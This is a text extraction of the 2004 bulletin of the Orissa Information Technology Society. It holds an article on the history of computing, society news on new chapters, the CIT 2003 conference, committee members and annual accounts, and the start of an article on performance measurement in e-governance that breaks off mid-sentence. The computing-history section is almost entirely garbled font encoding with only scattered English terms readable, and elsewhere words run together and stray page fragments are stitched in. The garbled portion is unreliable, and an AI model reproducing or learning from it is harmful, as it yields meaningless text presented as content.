AOgravecdividecETHOgrave_ SETHZTHORN ETHeTHORNthornaETH Ograved A^Ecirc_THORNL LOtilde`EcircOcircVethornethornS_L OgravekthornDRlaquoTHORNAEligAElig QETHmccedilthornjagrave aOcircETHOgraveaSccedilfrac14frac14ETH Ogravej 1834cjTHORNkthornETHOgraveethorn A_ETHmTHORNthornVTHORNLETHmccedilthorn BampTHORNfrac14_ccedil _ETHcLLOtilde`EcircOcircVethornVTHORNH DiexclthornETHa_ LeTHORNthornBOgravemthornfrac14frac14ETH `Ograveethorn `OgraveethornS_ccedil bTHORNthorn_THORNOgravejAtildeccedilcurren AVETH_ETHj$ccedilfrac14 HaOtilde LiacuteTHORNOgrave$frac14ETHXagraveIuml OgraveaeTHORNthorncTHORNhTHORN ABgETH Ogravefrac12currenVccedil macrEcircAElig_THORNbthornethornjTHORNVTHORNOgraveethorn `otildecBOgravemthornOgraveIacuteAEligETH_THORNLccediljccedil (Electronics) LOtilde`EcircOcircVethorn[THORNAeTHORNthorn LeTHORNthornTHORNOgravemthornfrac14frac14ETH HkTHORNthornWETHOgraveethorn kUacutethorn $frac14ETHfrac12currenOgraveSOgrave_Ograveethornj_ccedil (First Generation)LOtilde`EcircOcircVethornethorn S_ecirc OgravekthornETHBTHORNmthornETHfrac14frac14ETH ]eacuteTHORN[NtildemacrAElig aTHORNhegravedEcircwjcmacrAEligOgraveethorn H_THORNALccedil (ENIAC) LOtilde`EcircOcircVethorn _THORNcUgrave[OgravekthornETHBTHORNmthornETHfrac14frac14ETH 1946 cjTHORNkthornETHOgraveethorn _THORNcUgrave[ HkTHORNthornLOtilde`EcircOcircVethornLEcirc ethornMTHORNaETH `ETHBUuml 50 $Ecircfrac14Vccedil x 30 $Ecircfrac14VccedilOethornethorn AahOcircL[ETH OgravekthornETHBTHORNmthornETH HaOtilde HkthornETHethorn JS_THORNmthornETH 30 V_ccedilfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornOgraveethorn 18000bthornOcircETHLEcirccccedil VEcircOcircaccedil (Vaccum tube) mthornETHNTHORNTHORNmthornETHfrac14frac14ETHHkthornETH HL OgravejOgraveLumlAEligOgraveethorn 5000 `dagraveOcirclaquoAElig cTHORNhETHZ(Addition) LeTHORNthorn `ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETH c_EcirciOcircWETHeEcircthorn[OcirclaquoAEligAElig lTHORN otilde THORNmthornETHfrac14 j[ cETH[ouml aragravethorncETH_ethornLOtilde`EcircOcircVethornWETHeEcircthorn dOgravefrac12curren cxethorn THORNmthornETHfrac14frac14ETH `Ograveethorn `Ograveethorn1948 cjTHORNkthornETHOgraveethorn HLVagrave HaOtilde cOcircETHLccedilOgravemthorn cTHORNhTHORNHXccedilbthornETHLccedil (EDVAC) _ETHcL HL D_iuml[cETH_ethornLOtilde`EcircOcircVethornVTHORNH Ograve`_ccediljTHORNmccedilthornbthornETH_THORNAUuml aTHORNhegraveaTHORN]OcircETHfmacrAEligOgraveethornDiexclthornETHa_ LOgravemthornfrac14frac14ETH 1951Ograveethorn ]EcircOgravekthornUuml cTHORNhTHORN Ogravej_ccediljjccedilaEcircOcircOgraveethornETH (Census beaureau)Ograveethorn aOcircakthornETHethorn

OITS-2004

42

`ETHBUuml macrEcircAElig_THORNbthornETHLccedil LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LOgravemthornfrac14frac14ETH HTHORNOgraveethornQEcirccegraveLNtildemacrAElig OgraveV`ccedilOgraveethorn [Ocirc ethornkTHORNthornaETH Aethorncdivide OgravekthornmthornETHfrac14frac14ETHHkthornETH OgravekthornDRTHORN `otildec aOcircajETHmacrTHORNAEligL bTHORNthornrTHORNthornOgraveethorn aOcircakoacutethorn[LOtilde`EcircOcircVethornfrac14frac14ETH HkTHORNthorn `otildec `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn [oacuteVTHORNdEcircbrvbarAEligTHORNmthornETH HaOtilde Ograve_L SETHNETH cETHXIumlTHORN ajEcircTHORNmthornETHfrac14frac14ETH 1947cjTHORNkthornETHOgraveethorn Ograveamccedilthorn mthornETHOgraveaETHOgraveethornOgraveVETHeTHORNthornOgraveethorn (Bell Lab)VoumlETH_ccedilSTHORNfrac12currenethornethorn DiexclthornETHa_ OVTHORNTHORNmthornETHfrac14frac14ETH bthornOcircETHLEcirccccedil VEcircOcircaccedila]fOgraveethorn VoumlETH_ccedilSTHORNfrac12currenethornethorn aOcircakthornETHethorn ]eacuteTHORN[NtildemacrAElig `THORNYIumlNtildeethornLOtilde`EcircOcircVethornLEcirc S_ecirc Ograve]mthornETHfrac14frac14ETH Lcccedil Mnagrave OgraveRETHV ALETHethornHaOtilde ^THORNL aTHORNhegraveordfAElig OgravekthornETHBTHORNaETHeEcircthorn HkTHORNthorn `THORNYIumlNtildeethornLOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBmthornETHfrac14frac14ETH cETH[ouml NETHZTHORN[THORNLHaOtilde aOcircajETHmacrTHORNAEligL aTHORNOgravehyacuteiZ `ETHBUuml ]EcircB`otildeLETHethornethorn`w[THORN aOcircakoacutethorn[ OgravekthornDTHORNmthornETH dETHkthornETHLTHORN [OcirclaquoAEligAElig MnagraveETHlaquoAEligAEligaOcircETH`ETHethorn THORNmthornETHfrac14frac14ETH 1958Ograveethorn BAtildeTHORNcurrenOgraveNotildeOgraveVXccedil jLUgraveVccedil(Integrated circuit) DiexclthornETHaTHORN[ OgravekthornaETH`OgraveethornXTHORNSTHORNVETHmccedilthorn LOgrave`agraveETHOgraveethornj_ccedil (DigitalCorporation) OgraveNETHVTHORNH cTHORN_THORN LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETH dETHkthornETHLTHORN 15000 XmthornETHethornccedilOgraveethorn aTHORNLotildeTHORNOgravekthornETHBTHORNmthornETHfrac14frac14ETH `Ograveethorn ABaTHORNHcccedil (IBM) c^Ocirc[ETHethorn 360 jTHORNeTHORNthornSccedil (series) LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETHfrac14frac14ETH HkTHORNthornjaEcirc LOtilde`EcircOcircVethornNEcircXIumlTHORNL [oacute[NtildemacrAElig `THORNYIumlNtildeLOtilde`EcircOcircVethorn bthornETHaOgraveethorn `eTHORNthornNZTHORN[frac14frac14ETH `otildeOgravecOgrave`otildeETHNotildeETHcccedilethorncETHOgrave_ `iacuteNccedil OgraveaETHXagrave HaOtilde [ETHethorn aOcircakthornETHethornLeTHORNthorn LOtilde`EcircOcircVethorn jkthorn OgravedETHNETHOgravedETHN LeEcircthornTHORNOgravemthornfrac14frac14ETHHTHORNOgraveethorn 0 HaOtilde 1 LEcirc aTHORNbTHORNthorn_iuml YETHqETHOgraveethorn HAtildeoumlTHORNcurrenLethornETHdETHDTHORNmthornETHfrac14frac14ETH `Ograveethorn OgraveLETHamccedilthorn HaOtilde $frac14ethornccedilVoumlETH_ccedil `eTHORNthornbthornETHiETH HkTHORNthorn Lfrac12currenLethorn `w[THORNLEcirc jethornf LeTHORNthornOgrave]mthornETHfrac14frac14ETH1971 cjTHORNkthornETHOgraveethorn BOgraveAtildecurrenmccedilthorn _ETHcL HL LshyAEligETH_NtildecETHBOgraveLotildeETHOgrave`otildeETHOgravejjeccedilthorn (Microprocessor)

[THORNAeTHORNthorn LmthornETHfrac14frac14ETH HkthornETH kthornSETHethorn kthornSETHethorn VoumlETH_ccedilSTHORNfrac12currenethornLEcirc_THORNS c^OcircOgraveethorn HL OgraveRETHV QTHORN ccedil cETH^OcirccOgraveethorn ethornMTHORN`ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETHethorn D`ugraverTHORNthorn kUacutethorn Q[Ecircagrave `THORNYIumlNtildeLOtilde`EcircOcircVethornethorn S_ecirc OVETHBmthornETHfrac14frac14ETH HkthornETHethorn D`OgravedETHNOgravekthornaETH$frac14fOgraveethorn LOtilde`EcircOcircVethornethorn ALETHethorn AhETH[Ntilde[bthornETHaOgraveethorn LcTHORNNmthornETHfrac14frac14ETH Lcccedil Mnagrave HaOtilde ^THORNL OgraveaNHkthornETHLEcirc ^THORNL OgravemthornETHL`otildeTHORN AElig LethornETHBmthornETHfrac14frac14ETH 1981OgraveethornABaTHORNHcccedil (IBM) LshyAEligETH_Ntilde [ETHethorn `otildec`jagrave_ETHmccedilthorn LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornVETHBcccedil cETHNETHSTHORN_ccedil (Time Magazine) HkthornETHLEcircMan of the Year AMOcircETH Ograve]mthornETHfrac14frac14ETH Q[Ecircagrave`THORNYIumlNtildeethorn LOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBaETHeEcircthorn HkthornETHLEcircLTHORN eTHORNthorn Ograve]szlig_tTHORN_ LETHdagraveOcircOgraveethorn aOcircakthornETHethorn LeTHORNthornOgravekthornaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ [`ugraveethorn OgravekthornETHBDWTHORNOgravemthornfrac14frac14ETH1970 eEcircthorn 1980 cjTHORNkthornETH c^OcircOgraveethorn LOtilde`EcircOcircVethornOgravecETHVETHOgravecETHVTHORN bthornETHaOgraveethorn AOgraveceTHORNthornLETHaETHjNtildefrac14ethorn koacutethorn]macrAEligLEcirc^THORNLETHethorn LeTHORNthornjETHeTHORNthornTHORNmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornjEcirc ethorncETHOgraveLagraveVccedilNEcircXIumlTHORNL OgravejcETH_frac14ethorn LETHDAtildecurrenethorn ANOgraveethornLOtilde`EcircOcircVethorn OgraveLETHXIumlTHORNOtilde (Computer coding)OgravekthornETHBTHORNaETH QflaquoAEligETH aOcircETH_ethornccedilcETH_ mthornNETHBaETH AethorncdivideLOgravemthornfrac14frac14ETH

1976 cjTHORNkthornETHOgraveethorn OgraveSOgrave_ethornETHmccedilthorn OgravecETHVethornccediljccedilLshyAEligETH_Ntilde `otildec ethorn `ETHBUuml [ETHethorn LETHethornccedilOgraveethornLOtilde`EcircOcircVethornVTHORNH mthornNETHBmthornETHfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornVTHORN LETHethornccedilethornOgraveaN Ograve[szligfethorn `eTHORNthorncETHZ aOcircETHOgraveVethornNtildeethorn OgravemthornOgravebthornmccedilthornOgrave[szligfethorn QETH` HaOtilde BOtildeSTHORN_ccedilethorn ayETHLEcirc Ograved OgraveLtimesZjTHORNjcmacrAEligOgraveethorn cETH`THORN `ETHeEcircthornTHORNmthornETHfrac14frac14ETH 1978 cjTHORNkthornETHethorn _OcircHL OVZETH jcNotilde `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QcLuacuteIgrave[LeTHORNthornTHORNmthornETHfrac14frac14ETH HkTHORNthornaiagrave OgraveQjccedilethorn NotildeETHumlccedilAElig cETHfrac12currenethorn `THORNVeccedilthorn

OITS-2004

43

aTHORN AEligjTHORNjccedilEcircfrac14 LOtilde`EcircOcircVethorn OgraveQjccedil OgraveMfOgraveethorn kthornethornETHBTHORNmthornETHfrac14frac14ETHaTHORNsETH_ethorn NotildeN[THORN jkthorn jETH^ETHethornZ OgravemthornETHL LTHORN eTHORNthornLOtilde`EcircOcircVethornLEcirc akEcircthornf bthornETHaOgraveethorn aOcircakthornETHethorn LeTHORNthorn ETHeTHORNthornOgraveaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ `otildeOgraveQfrac12currenETH QfETHBOgravemthornfrac14frac14ETHOgraveSethornmicroAElig HaOtilde A`mccedilthorn (Apple) LshyAEligETH_NtildeLOtilde`EcircOcircVethornLEcirc QfETHBaETH`ETHBUuml jkthornS D`ETHmacrAElig aETHkthornETHethornLOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn cETHBOgraveLotildeETHj$ccedilfrac14Vccedil(Microsoft)ethorn Windowsethorn DiexclthornETHa_jETH^ETHethornZ OgravemthornETHLfrac14ethorn QETHkTHORNthorn]ETHLEcirc dOgravefrac12curren aYIumlETHBmthornETHfrac14frac14ETHaragravethorncETH_ccedil AOgravec `qc `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn D`OgraveethornAOgravemthornETHQ_ETH LeTHORNthornaETHfrac14frac14ETH HkthornETHethorn NotildeN[THORN `ETHBUumlOgraveaszligsETH_THORNLcETHOgrave_ ]THORN_ethornETH[THORN NOgraveaiZETH LeTHORNthorn _EumlA _EumlA[Ocirc cETH^OcirccOgraveethorn `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QLTHORN[ LeTHORNthornaETHOgraveethornmthornETHNTHORNRlaquoTHORNAEligAEligfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn cZTHORNi `eTHORNthorn QTHORNlaquoAEligAEligETHLeTHORNthorn ETHOgraveethornfrac14frac14ETH HkthornETH Ograve]MTHORN ETHOgraveethorn lethorn QTHORNkiumlTHORNthorn ETHOgraveethornHaOtilde cZTHORNi `eTHORNthorn _Ecircbthorna LeTHORNthorn ETHOgraveethornfrac14frac14ETH jaEcircWETHeEcircthorncSETHLETH OgravekthornmthornETH HkthornETH hveEcircthorn bTHORNthorn_iuml bTHORNthorn_iuml OgravemthornETHLEcircfrac14QTHORNkiumlTHORNthorn ETHOgraveethorn HaOtilde RaTHORNeEcircthorn c^Ocirc aTHORNOgravehyacuteiZ LeTHORNthorn bTHORNthorn_iuml[ETHaETHeTHORNthorn ETHOgraveethornfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethornOgraveethorn Loacute[oumlTHORNc aEcircwTHORN(Artificial Intelligence)ethorn jkthornETHmacrAElig[ETH_THORNAdETHHfrac14frac14ETH HkTHORNthorn ]ccedilbEumlthorn[ aTHORN]OcircETHethorn `otildeOgravemacrAEligETHN $frac14fOgraveethornLOtilde`EcircOcircVethorn MZTHORN bTHORNthorn[Ograveethorn `otildeOgraveah LeTHORNthorn aTHORNOgravehyacuteiZLeTHORNthorn ETHOgraveethorn DrthorncopyAElig AOgraveNiuml AEligNTHORNeTHORNthorn c^OcircOgraveethorn `otildeOgraveahLeTHORNthorn [Ocirc jOtildeNotildekthorn LeTHORNthorn ETHOgraveethorn XETHbrvbarAEligethorn `eTHORNthorn OgraveethornNNtildeOgrave]MTHORN ETHOgraveethorn cZTHORNi `eTHORNthorn D``ETH]OcircLEcirc `otildecETHZLeTHORNthorn ETHOgraveethorn `ETHZTHORNOgraveethorn aEcircXIumlTHORN ETHOgraveethorn HaOtilde [ETHjccedil J OgraveQjccedilA]THORN OgraveMfTHORN ETHOgraveethornfrac14frac14ETH OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml[NtildelccedilZ aEcircwTHORN HaOtilde NETH^ sETH_ethorn AahOcircL[ETH

OgravekthornETHBETHHfrac14frac14ETH dETHkthornETHLTHORN Ograve_L jcmacrAEligOgraveethorn SOgraveZjETH^ETHethornZ OgravemthornETHL `lOgraveethorn jcdividea OgravekthornETHB _ETHHfrac14frac14ETHH`eTHORNthornLTHORN OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml HLeEcircthorn ^THORNLaTHORN]OcircETHOgraveethorn `ETHethorn=frac14c THORNaETH OgravemthornETHL ]ethornLETHethornOgravekthornETHBETHAlaquoTHORNAEligfrac14frac14ETH OgravejkTHORNthorn eTHORNthorn `otilde[THORNbthornETHaETH_ccedil aOcircbrvbarTHORNAEligfrac14ethorndOgravefrac12curren bthornETHa `eTHORNthornmthornlTHORN[ OgravekthornETHBETHHfrac14frac14ETH cETH[ouml Loacute[oumlTHORNcaEcircwTHORNethorn D`OgravedETHNOgraveethorn _THORNcUgrave[ Expert system HkTHORNthornbthornETHa EumlethornZ LeTHORNthornETHHfrac14frac14ETH

aEcircwTHORNcETH_ccedil aOcircbrvbarTHORNAEligVTHORNH Ograved`eTHORNthorn _EumlA`eTHORNthornOgraveahOgraveethorn _THORNSLEcirc hNtildeOotilde METH`ccedil MEcircAB Ograve_BETHHHkTHORNthorn qc THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn _THORNSethorn NtildehbrvbarTHORNAElig afOgraveethornSVTHORNf LETHdagraveOcircLEcirc jcETH^ETH_ LeTHORNthornETHHfrac14frac14ETH

About the author Jyotiranjan Hota is a softwareconsultant with an exposure to Indian and Internationalprojects He is a BE in Computer Science from NITRourkela and Executive PGP from Xavier Institute ofManagement Bhubaneswar He has around 11 yearsof experience in software consultancy teaching researchactivities and management consultancy He is fond ofwriting technical and general articles in newspapersand Journals of India and abroad His previousexperience includes World Bank funded Projects TataConsultancy Services and OCAC Currently he isassociated with KIIT Deemed University in Departmentof Computer Science and IT His area of strength liesin software engineering DBMS Object OrientedAnalysis and Design Software Project ManagementProfessional Ethics and Decision Support System

Page 9: oits-2004.pdf - created by pdfMachine from Broadgun …OITS-2004 2 Prizes were distributed by the Chief Guest, Bikramjit Maitra. In the senior category, the first, second and third

OITS-2004

5

try to make the programs self-sustaining Thename of the bank account of the chapter is OITS-Rourkela

Rourkela chapter at present has seventeenmembers The secretary as below has intimatedthat the following office bearers have takencharge

1 President G Panda NIT Rourkela

2 Secretary D P Acharya RIMS

3 Treasurer Barnali Pradhan RIMS

Let us wish rourkela chapter all success

F Opening of BERHAMPUR CHAPTER

Some oits members of BerhampurUniversity NIST and NIC belonging toberhampur met on 29th March and resolved thatthey wish to open the berhampur chapter of oitsThey also elected the following members as officebearers

President M R Patra (BU)Vice-President R K Dash (NIC)Secretary Indraneel Mukhopadhyay (NIST)Treasurer S K Padhi (BU)

I received the above communication fromthe secretary on 3032004 We discussed thematter in the executive committee on 3132004and decided that the opening of the berhampurchapter be approved and that the same may befollowed up by the new executive committee

G OITS BULLETIN

OITS has started bringing out a Bulletinwith semi-technical articles with the first issue(December 2003) being inaugurated duringcit2003 It was initially thought that it would anyearly bulletin but then in the last general bodyit was decided that it may come out during Juneand December of every year This can be viewed

downloaded from the website This along withmany very interesting articles contains an articleby S P Misra indicating the gradual evolution ofoits

H CIT 2003

The Conference organised by OrissaInformation Technology Society (OITS) andSilicon Institute of Technology de facto extendedfrom 21st December to 25th December 2003 On21st there was a Symposium on IT andEducation mainly organised by the SiliconInstitute where there were seven speakers fromdifferent parts of India This was conducted byNeharika Vohra from IIM ahmedabad

In the afternoon the same day there wasan inauguration function for the ConferenceHere N R Mohanty Chairman HAL Bangalorewas the Chief Guest Damodar Acharya Vice-Chancellor Biju Patnaik University ofTechnology was the guest of honour and VinayDeshpande chairman Encore Software Pvt LtdBangalore was the Chief Speaker P K Dashwelcomed all Sudeshna Sarkar spoke about theConference and S P Misra gave a vote of thanksAll the three guests gave wonderful inspiringtalks with a common theme being to have a senseof confidence by all of us that things arehappening will happen and in IT or in otherfields we need not be second to any othercountry

The main Conference was from 22ndDecember to 24th December in Swosti PlazaBhubaneswar During the Conference therewere three keynote talks (by (i) S K TripathyUCR USA (ii) Y Pratt UT Arlington USA (iii)Sajal Das UT Arlington USA) eight invited talksand three advanced tutorials Around 230delegates from 12 countries including Indiaregistered for the Conference and 122 presented

OITS-2004

6

their papers in the different technical sessionsThere was also an industry session with thetheme as India sustaining leadership positionin the global IT market

On 24th afternoon the valedictory functiontook place as the last function of the ConferenceS P Misra President OITS conducted the sameThe program chairs briefly recapitulated thesalient features of the Conference and then asin the last year the results of the two best paperawards were given (i) Amiya K Pujari IT awardof Rs5000- and a certificate for the best paperamong all the papers submitted and presentedin the Conference went to Joydeep Ghosh ofUniversity of Texas Austin USA for the paperentitled A probabilistic approach to privacy-sensitive distributed data mining done incollaboration with Srujana Merigu (ii) NarayanMisra IT award of Rs4000- and a certificatefor the best paper among all the papers submittedfrom Orissa and presented in the Conferencewent to D P Das Silicon Inst of Tech bbsr forthe paper entitled Electricity distribution datamining using soft computing and modifiedwavelet analysis done in collaboration with PK Dash

On 25th December in addition to the threeadvanced tutorials during the Conference sixtutorials were organised two of six hourduration and four of three hour duration atHotel Swosti Plaza All the tutorials wereapproximately with sixty participants each andwere well received

Some more information about theconference can be had from the websiteI Organisation of CITs

In the general body meeting of december23rd 2003 the following observations regardingorganisation of cits were made It was decided

that CIT could be held outside orissa if we findorganiserssponsors However the frequencyof hosting outside orissa can not exceed once inthree years

It was also noted that cit2004 had beendecided by the existing steering committee to beat hyderabad and was appreciated by membersas the exposure of oits members to the IT scenarioin hyderabad will be helpful to take up similaractivities in orissa

Consistent with the spirit of the earlierCITs it was recommended by the general bodythat (i) for academic participants in cit2004 theregistration fees from inside India for academicsbe Rs2000- (ii) oits members as such shall havea discount of 25 and (iii) oits members whodo not have institutional or project support shallhave a discount of 50 subject to their certifyingto that effect

Steering Committee of CITs It was alsofelt desirable that the constitution of the steeringcommittee practised since december 1999 needsto be modified It was thought desirable to havefour permanent members here and some rotatingmembers After some discussions it was thoughtthat the permanent members may be (two fromUSA and two from India)

1 Prasant Mohapatra2 R N Mohapatra (Steering Chair)3 G Panda (NIT rourkela)4 S P Misra

It was also decided that the rotatingmembers of the nth cit shall be the generalchair(s) the program chairs and the organisingchair of the (n-1)th cit along with the incumbentpresident of oits during the period of theconference

Thus the general body resolution ofdecember 1999 now stands replaced by the

OITS-2004

7

above There is an article in the bulletinregarding the progressive evolution of the CITsregarding organisation matters

As is the procedure now these members ofthe steering committee shall seek suggestionsoffers from different mebersinstitutions as theymay think appropriate The steering committeelist shall be intimated to all the oits members assoon as possible

J Executive Committee of OITS

The following are the office bearers in theexecutive committee from 1st april 2004 to 31stMarch 2006 as decided in the general body on23122003

1 President J R Sahu2 Vice-President S Padhy3 Secretary S K Pradhan4 Secretary (overseas) P Mohapatra5 Joint Secretary S K Udgata (Berhampur)6 Joint Secretary B K Patel (Sambalpur)7 Treasurer A K Nayak

In addition the following additionalmembers were also elected to the executivecommittee

S P MisraB Misra (bsnl)A K Panda (ceo elmark)P K Behera (csa uu)S TorasiaS K MohantyA K Das (etdc)Chitta Baral (asu)J R Hota (KIIT Deemed University)

The executive committee as above willoperate from 1st april 2004 till 31st March 2006

K OITS Accounts

There were 48 new life members one donormember one institutional member and one morelife member who registered with the sambalpurchapter The total membership of OITS nowstands at abput 220 NIST conducting cit2001had not returned an advance of Rs20000-given to them they have now returned the samealong with an additional Rs2000- The balancefrom cit2002 amounting to about Rs195000- was a good addition to corpus of funds of oitsof which about Rs2000- was spent for auditingthe accounts of the same We particularlyappreciate the generous assistance of OrissaSociety of Americas of an amoount of aboutRs48600- to oits through personalcontributions Income from IT olympiad roughlybalanced the expenditure in conducting thesame however from OITS funds we have paidabout Rs20000- as prize money which wehope will focus on IT activities for the studentsAlso OITS transferred a sum of about Rs22000- from our corpus of funds to the corpus of fundsof sambalpur and rourkela chapters for openingof the two chapters and we hope the newexecutive committee will do the same forberhampur chapter

The balance with oits at present isRs68888862 of which about Rs636400- iskept in fixed deposits This account along withthe earlier accounts may be seen in appropriateoits website

About the author He is basically a physicist Fiveresearchers working with him have won the prestigiousAlexander von Humboldt fellowship His bookIntroduction to Supersymmetry and Supergravitywas a best seller for more than five years in amazoncomand has been recommended by Prof Witten of Instituteof Advanced Studies Princeton to his researchersNow engaged in organization of OITS

OITS-2004

8

Credit in Rupees Debit in Rupees(a) Brought Forward 41087512 (a) Orissa IT Olympiad Test 3428100(b) Life Members (48) 3110000 (b) Orissa IT Olympiad Prizes 2050000(c) Doner Members 500000 (c) Auditor 216000(d) Institional Members 150000 (d) OITS Bulletin 548000(e) Transfer from SBP chapter 4000 (e) CIT-03 Prizes 900000(f) Return of advance from NIST 2200000 (f) Opening of SBP Chapter 1080000(g) Return of advance from CIT-02 19506250 (g) Opening of RKL Chapter 1121000(h) Orissa IT Olympiad-03 3856800 (h) Contigency 112100(I) Donation from OSA 4863500 (I) Bank Charges 4000(j) Contribution from IDBI agent 150000(k) Bank Interest 2920000

Total 78348062 Total 9459200

Abstract of Accounts of Orissa Information Technology Society (OITS)for the Financial Year 2003-2004

This Consists of

(i) Four fixed depos its of Rs60000- each with deposit numbers IDBI-Suvidha 12500497-00500 Dt 21082003 and 01092003 (ii) One fixed deposit of Rs 300000- with depos it number IDBI-Suvidha 12500563 (iii) One fixed depos it of Rs 37145- with deposit number Syndicate Bank 5908 Dt 23032004 (iv) One fixed depos it of Rs 59288- with depos it number Syndicate Bank 5909 Dt 24032004(b) An effec tive balance in Syndicate Bank account (no 475) Rs 4291162- This includes (i) Rs 800- depos ited by us which is not yet c redited and (ii) Cheques of

(c ) Cash in hand Rs9544-

Postscript On 31st March the cheque of Mr A Patnaik was encashed Further on 3rd april an amount of Rs 9000- has been depos ited tak ing it from copy to (b)

(SP M isra) (A K Nayak)President Treasurer

Rem a rks Besides above an amount of Rs 40000- was given as seed money for CIT 2003 Organised by OITS and S ilicon Ins titute of Technology which is yet to be returned by the organising chair and finance chair CIT 2003

(a) Fixed deposits of Rs636433- with details as below

Rs11210-(oits-rk l13022004ch no 172213) Rs2500-(Bagdebi Panda18012004 ch no 510899) Rs500-(Anurag Patnaik24012004ch no 172205) and Rs 500- (A Agarwal24012004ch no 172207) issued by us which have not been

Thus Ba la nce on 31st Ma rch 2004 is Rs 68888862

OITS-2004

9

A transformation in governments isoccurring worldwide through the use of ICT andacceptance of the Internet and communicationstechnology by various governments for betterCitizens Services Yet there are some lacunae inthe governments internal system architecturefor e-governance services and its applicationsWhat counts is how the government performsits work utilising people business process dataand technology at reduced cost eliminatingbureaucracy and becoming more openresponsive and accountable

A holistic approach is needed for every e-Government initiative and this must includeperformance measurement the right kind ofpolicy alignments training communicationknowledge management and internalorganisational goal changes Governments willprovide more individualised services at less costto its citizens at the right place and the righttime

The one question that arises is what willbe the form of the future government in terms ofdelivery of services and its application tocitizens by using Information CommunicationTechnology How can the government fulfil itsobligations in the best possible way by usingICT for better governance or e-Governance

Three major issues are encountered inproper e-governance initiatives by the

The Transition from Physical Governance toe-Governance

Measurement-based change management systems A model for e-Governance

Use of ICT by the Government to provide better Citizens Centric Services andApplication through performance measurement based on change management in internalorganisational transformation set-up that is called e-Government

Raj Kumar Prasadgovernment to provide Citizen CentricGovernment services Here also services are notwell defined because of the governmentsinternal organisational set up This featureattempts to discover the most challenging linkfor better e-Government initiatives in India Threewords ICT Performance Management andMeasurement and Change Management usedherein are directly linked with the success of e-Government that ultimately ends at e-Democracy To have the maximum ICT outputfor governance we must first understand whatgood governance is all about

Good governance has eight majorcharacteristics It is participatory consensus-oriented accountable transparent responsiveeffective and efficient equitable and inclusiveand follows the rule of law It ensures thatcorruption is minimised the views of minoritiesare taken into account and that the voices of themost helpless in society are heard in decision-making It is also responsive to the present andfuture needs of society

Good governance requires that institutionsand processes try to serve all stakeholders withina reasonable timeframe

It is necessary to analyse two major issuesthat were previously not linked with e-governance Performance Measurement and itsManagement and Change Management We

OITS-2004

10

have considered performance management inrespect of Human Resources presently with thegovernment

What is Performance Management andhow is it linked with Change Management Howcan it be measured We also define the newdefinition of e-governance in respect ofPerformance Measurement and ChangeManagement In a simplistic way PerformanceManagement can be defined as translating plansinto results execution It is also the process ofmanaging strategy for best outcomes and resultsPerformance Management considers asmanageable variable like strategy measuresorganisation charts processes reward incentiveemployee competencies culture andtechnologies

Good performance measures accomplishfour things

Strategise The strategy of organisation shouldbe very clear from the examination of employeeperformance measures

Communicate Performance measurescommunicate albeit different things to differentpeople They show employees at all levels of theorganisation how their jobs fit into the big picture

Figure 2 Characteristics of good governanceSource UN ESCAP

and how they can personally contribute tomission fulfilment and achievement Theyconvey important information to seniormanagers programme managers stakeholdersand the masses

Motivate You need to focus on performancemeasures that will stimulate the necessarybehaviour changes among employees Byinstituting a system of measures that promotestransparency the organisation can motivatebetter performance and guide programmemanagers in their work

Manage Performance measures addressmanagement challenges by illustrating thelinkages between todays activities processesand outputs and the intermediate and endoutcomes of the future Performance measuresshould be relevant to the information needs ofprogramme managers policymakers and thepeople

Why Measure performance What dopeople expect to do with the measures Howare people actually using these performancemeasures What is the rationale that connectsthe measurement of the governmentsperformance to some higher purpose These arethe major issues today There are eight purposesthat public managers have for measuringperformanceThe Purpose - The public Managers questions thatthe performance measures can help answerEvaluate- How well is my public Agency performingControl- How Can I ensure that my subordinate aredoing the right thingsBudget- On what programs peopleor projects shouldmy agency spend the public moneyMotivate-How can motive staff middle managers ngostakeholders and Citizens to do the thing necessary toimprove performancePromote-How can convince political superiorslegislators stakeholders journalists and citizens thatagency is doing good job

OITS-2004

11

Celebrate- what accomplishments are worthy of theimportant organizational ritual of celebrating successLearn-Why is what working or not workingImprove- what exactly should who do differentlyto improve performance

Prof Robert D Behn defined theabovementioned measures in his paper onPublic Administrative Review Journal editionSeptemberOctober 2003 Vol 63 No5 Prof Behnis a Lecturer at Harvard Universitys JF KennedySchool of Government and also a faculty chairof its executive programme Driving GovernmentPerformance

We are convinced about Prof Behns ideaand his paper that we should measureperformance and make every person accountablefor delivery of work in a given timeframe in theDigital Age and for better or good governanceProf Behn mentions that performance measurescould be used for multiple purposes Moreoverdifferent people have different purposes

But we think the ultimate goal ofperformance measurement must relate to thework environment and the work culture in everysegment a government agency NGOstakeholders citizens or corporates All of themmust be accountable for their role and work andthis can be only happen if we make aperformance measurement index in everysegment and link it with Change Management

This issue of Change Management quiterapid at times is a fundamental challenge to beaddressed by the practise of e-Governance Thiswould involve

Delivery of public services like utilitiesrural and urban development schemesthrough EDI Internet and other IT-basedtechnologies that would necessitateprocedural and legal changes in the

decision and delivery-making processes aswell as institutions

Fundamental changes in governmentsdecision management

Changes in decision-making procedures interms of decision-making levels anddelegation of authority

Mandatory changes in legal provisions togive effect to the technology objectives

Accordingly the issues to be addressedrelate to

